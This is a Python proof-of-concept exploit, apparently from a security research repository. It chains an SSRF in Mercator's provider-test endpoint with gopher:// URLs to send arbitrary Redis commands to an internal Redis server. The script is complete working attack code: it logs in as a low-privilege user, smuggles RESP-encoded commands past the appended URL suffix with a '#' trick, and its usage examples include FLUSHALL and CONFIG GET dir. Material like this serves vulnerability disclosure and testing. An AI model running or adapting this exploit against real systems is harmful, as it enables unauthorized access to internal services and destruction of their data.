README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Mercator SSRF -> gopher:// -> Redis helper.
Sends ONE Redis command (or a small pipeline of them) to an internal Redis
instance through the SSRF in `ConfigurationController::testProvider`.
Why this works
--------------
1. The vulnerable controller calls `curl_init($provider . '/api/dbInfo')`.
We append `#` to our URL so curl drops the `/api/dbInfo` suffix as a
URL fragment.
2. libcurl in the deployed PHP container speaks `gopher://`. Gopher URLs
of the form `gopher://host:port/_<bytes>` send `<bytes>` raw on the
wire after dropping the single type character `_`.
3. We URL-encode RESP-encoded Redis commands as `<bytes>`. Redis happily
parses them and executes.
Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role, so a regular low-privilege account is sufficient.
Usage
-----
# Single command
./bin/python3 ssrf2redis.py \\
--base http://127.0.0.1:8000 \\
--user lowuser --password 'Lowuser123!' \\
--redis 127.0.0.1:6379 \\
--cmd SET ssrf_proof 'pwned-by-low-priv'
# Pipeline (commands separated by a literal ';' token)
./bin/python3 ssrf2redis.py ... --pipeline \\
FLUSHALL ';' \\
SET marker hello ';' \\
CONFIG GET dir
The script reports the flash message returned by Mercator (an oracle), not
the Redis reply — gopher is fire-and-forget here; verify the effect with a
follow-up command or out-of-band check.
"""
import argparse
import re
import sys
import urllib.parse
import warnings
# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")
import requests
import urllib3
urllib3.disable_warnings()
# Captures the value that follows a `name="_token"` attribute; searched in the
# /login page body and used as a fallback on the post-login page.
LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
# Captures the `content` that follows a `name="csrf-token"` attribute; tried
# first on the page returned after a successful login.
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
# Captures one of the two status messages this script looks for on the
# configuration page, up to (not including) the next `<`, `"` or `'`.
FLASH_RE = re.compile(r'(Could not connect to provider[^<"\']*|Last NVD update:[^<"\']*)')
# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────
def log(message):
    """Print a status line on stderr; stdout is left untouched for result data."""
    stream = sys.stderr
    print(message, file=stream)
def die(message):
    """Report a fatal error through `log` (prefixed with `[!]`) and exit with status 1."""
    log(f"[!] {message}")
    # Same effect as sys.exit(1): both raise SystemExit carrying the code 1.
    raise SystemExit(1)
def login(session, base, user, password):
    """Log `user` in through the /login form and return a CSRF token.

    Steps, in order:
      1. GET /login and pull the `_token` form value out of the page.
      2. POST the credentials together with that token, following redirects.
      3. Treat ending up on a URL that still ends in /login as a failed login.
      4. Extract a token from the landing page, trying CSRF_META_RE first and
         LOGIN_TOKEN_RE second.

    A summary (user, every session cookie, the token) is written via `log`.
    Any failure along the way terminates the process through `die`.
    """
    login_url = f"{base}/login"

    form_page = session.get(login_url, timeout=10)
    form_token = LOGIN_TOKEN_RE.search(form_page.text)
    if form_token is None:
        die("CSRF token not found on /login")

    credentials = {
        "_token": form_token.group(1),
        "login": user,
        "password": password,
    }
    landing = session.post(
        login_url, data=credentials, timeout=10, allow_redirects=True)

    # Still sitting on the login page after redirects means we were bounced back.
    final_url = landing.url.rstrip("/")
    if final_url.endswith("/login"):
        die(f"authentication failed for '{user}'")

    token_match = CSRF_META_RE.search(landing.text)
    if token_match is None:
        token_match = LOGIN_TOKEN_RE.search(landing.text)
    if token_match is None:
        die("CSRF token not found after login")
    csrf = token_match.group(1)

    log("[+] login")
    log(f" user : {user}")
    for cookie in session.cookies:
        log(f" cookie : {cookie.name}={cookie.value}")
    log(f" csrf token : {csrf}")
    return csrf
# ── SSRF -> gopher -> Redis ─────────────────────────────────────────────────
def require_configure(session, base):
    """Abort via `die` if the configuration page answers HTTP 403.

    Only a 403 is treated as "permission missing"; every other status code
    lets the caller continue.
    """
    settings_url = f"{base}/admin/config/parameters?tab=cve"
    response = session.get(settings_url, timeout=10)
    forbidden = response.status_code == 403
    if forbidden:
        die("account lacks the 'configure' permission")
def resp_encode(command):
    """Serialize one Redis command as a RESP array of bulk strings.

    `command` is a sequence whose items are `str` (encoded with the default
    UTF-8 codec) or bytes-like values (used as-is). The result is the array
    header `*<count>\\r\\n` followed by `$<length>\\r\\n<data>\\r\\n` for each
    item, returned as `bytes`.
    """
    frame = bytearray(b"*%d\r\n" % len(command))
    for arg in command:
        payload = arg.encode() if isinstance(arg, str) else arg
        # The length prefix counts bytes, so it is computed after encoding.
        frame += b"$%d\r\n" % len(payload)
        frame += payload
        frame += b"\r\n"
    return bytes(frame)
def build_pipeline(items):
    """Group a flat token list into commands, splitting on the literal ';' token.

    Returns a list of token lists, one per command. Separators that would
    produce an empty command (leading, trailing or repeated ';') are ignored.
    """
    commands = []
    pending = []
    # A trailing sentinel separator flushes the last command inside the loop.
    for token in [*items, ";"]:
        if token != ";":
            pending.append(token)
        elif pending:
            commands.append(pending)
            pending = []
    return commands
def fire(session, base, csrf, gopher_url):
    """Submit `gopher_url` as the provider to test and return the flash message.

    The POST carries the CSRF token, spoofs the method as PUT through the
    `_method` field and selects the `test_provider` action on the `cve` tab.
    Its response is discarded and redirects are not followed; the message is
    instead scraped from a follow-up GET of the same settings tab.

    Args:
        session: authenticated HTTP session (as prepared by `login`).
        base: Mercator base URL, without a trailing slash.
        csrf: CSRF token to send in the `_token` field.
        gopher_url: value placed in the `provider` field.

    Returns:
        The first FLASH_RE match found in the settings page, or the literal
        string "(no flash captured)" when nothing matches.

    Raises:
        requests.RequestException: on connection errors or when either
            request exceeds its timeout.
    """
    endpoint = f"{base}/admin/config/parameters"
    session.post(
        endpoint,
        data={
            "_token": csrf,
            "_method": "PUT",
            "active_tab": "cve",
            "action": "test_provider",
            "provider": gopher_url,
        },
        allow_redirects=False, timeout=20,
    )
    # Bound this read as well: without a timeout, requests waits indefinitely
    # on an unresponsive server. 10s matches the other GETs in this script.
    page = session.get(f"{endpoint}?tab=cve", timeout=10).text
    m = FLASH_RE.search(page)
    return m.group(1) if m else "(no flash captured)"
def main():
    """Command-line entry point.

    Parses the arguments, turns `--cmd` / `--pipeline` into a list of Redis
    commands, RESP-encodes and percent-encodes them into a single gopher URL,
    then logs in, checks the `configure` permission and submits the URL.
    All progress and the captured flash message are written through `log`.

    Exits through `die` (status 1) when the command options are missing,
    both given, or contain no actual command.
    """
    ap = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)
    ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--redis", required=True, help="host:port of the target Redis")
    ap.add_argument("--cmd", nargs="+", help="single Redis command, e.g. SET k v")
    ap.add_argument("--pipeline", nargs="+",
                    help="multiple commands separated by a literal ';' token, "
                         "e.g. FLUSHALL ';' SET k v ';' SAVE")
    args = ap.parse_args()

    if args.cmd and args.pipeline:
        die("use either --cmd or --pipeline, not both")
    if not args.cmd and not args.pipeline:
        die("provide --cmd or --pipeline")

    commands = [args.cmd] if args.cmd else build_pipeline(args.pipeline)
    # A pipeline made only of ';' separators parses to nothing; stop before
    # logging in rather than submitting an empty payload.
    if not commands:
        die("pipeline contains no commands")

    raw = b"".join(resp_encode(c) for c in commands)
    # safe='' percent-encodes every reserved byte (including '/'); the
    # trailing '#' turns whatever the server appends into a URL fragment.
    gopher_url = f"gopher://{args.redis}/_{urllib.parse.quote(raw, safe='')}#"

    session = requests.Session()
    session.verify = False  # TLS certificate verification is disabled for this session
    csrf = login(session, args.base, args.user, args.password)
    require_configure(session, args.base)

    log(f"[*] sending {len(commands)} Redis command(s) to {args.redis} via gopher SSRF")
    for c in commands:
        log(f" - {' '.join(c)}")
    flash = fire(session, args.base, csrf, gopher_url)
    log(f"[+] flash: {flash}")
    log("[*] flash is Mercator's view of the gopher response, not Redis — "
        "verify side effects out-of-band")
# Script entry point: run main() and turn the two expected failure modes
# into a one-line error via die() instead of a traceback.
if __name__ == "__main__":
    try:
        main()
    except requests.RequestException as exc:
        # Any HTTP-layer failure raised by requests (connection, timeout, ...).
        die(f"could not reach Mercator: {exc}")
    except KeyboardInterrupt:
        # Ctrl-C from the operator.
        die("interrupted")